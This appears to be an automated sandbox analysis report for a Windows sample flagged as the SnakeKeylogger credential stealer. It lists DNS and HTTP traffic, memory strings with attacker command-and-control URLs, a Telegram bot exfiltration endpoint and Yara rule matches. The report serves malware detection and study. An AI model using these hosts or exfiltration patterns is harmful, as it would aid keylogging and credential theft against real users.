Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.pymetal.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 01 Oct 2024 08:55:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.pymetal.net
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2061901731.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2111265878.0000000002701000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20a
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enx
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/x

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49744 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_02ECD5BC	0_2_02ECD5BC
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_077325B0	0_2_077325B0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_07732178	0_2_07732178
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_07732168	0_2_07732168
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_07731D40	0_2_07731D40
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_07733C58	0_2_07733C58
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_07731908	0_2_07731908
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FC146	9_2_013FC146
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F5362	9_2_013F5362
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FD2C8	9_2_013FD2C8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FD599	9_2_013FD599
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FC468	9_2_013FC468
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FC738	9_2_013FC738
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F69A0	9_2_013F69A0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F29E0	9_2_013F29E0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FCD28	9_2_013FCD28
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F9DE0	9_2_013F9DE0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FEC18	9_2_013FEC18
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FCFF7	9_2_013FCFF7
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F6FC8	9_2_013F6FC8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F3E09	9_2_013F3E09
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FF804	9_2_013FF804
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FEC0B	9_2_013FEC0B
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013FFC48	9_2_013FFC48
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B65290	9_2_06B65290
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B69E80	9_2_06B69E80
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B62288	9_2_06B62288
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B61BA8	9_2_06B61BA8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B60B30	9_2_06B60B30
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B69590	9_2_06B69590
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B62970	9_2_06B62970
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B65280	9_2_06B65280
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6F620	9_2_06B6F620
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6F610	9_2_06B6F610
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B68E08	9_2_06B68E08
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6FA78	9_2_06B6FA78
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B62278	9_2_06B62278
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6FA69	9_2_06B6FA69
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B697B0	9_2_06B697B0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6D7B8	9_2_06B6D7B8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B61B97	9_2_06B61B97
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B60B20	9_2_06B60B20
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6CF08	9_2_06B6CF08
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6D360	9_2_06B6D360
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6D351	9_2_06B6D351
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6E4B1	9_2_06B6E4B1
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6E4C0	9_2_06B6E4C0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6DC10	9_2_06B6DC10
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B60006	9_2_06B60006
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6DC01	9_2_06B6DC01
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6E067	9_2_06B6E067
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6E068	9_2_06B6E068
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B60040	9_2_06B60040
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6F1B9	9_2_06B6F1B9
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6F1C8	9_2_06B6F1C8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6E918	9_2_06B6E918
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6E908	9_2_06B6E908
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6ED70	9_2_06B6ED70
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B6ED60	9_2_06B6ED60
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_00B4D5BC	10_2_00B4D5BC
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09011908	10_2_09011908
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09011D30	10_2_09011D30
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09011D40	10_2_09011D40
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09013C47	10_2_09013C47
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09013C58	10_2_09013C58
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09012168	10_2_09012168
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09012178	10_2_09012178
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_090125B0	10_2_090125B0
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_090154A9	10_2_090154A9
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 14_2_00F829D0	14_2_00F829D0
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 14_2_00F83E09	14_2_00F83E09

Source: C:\Users\user\AppData\Roaming\AcEnrS.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500

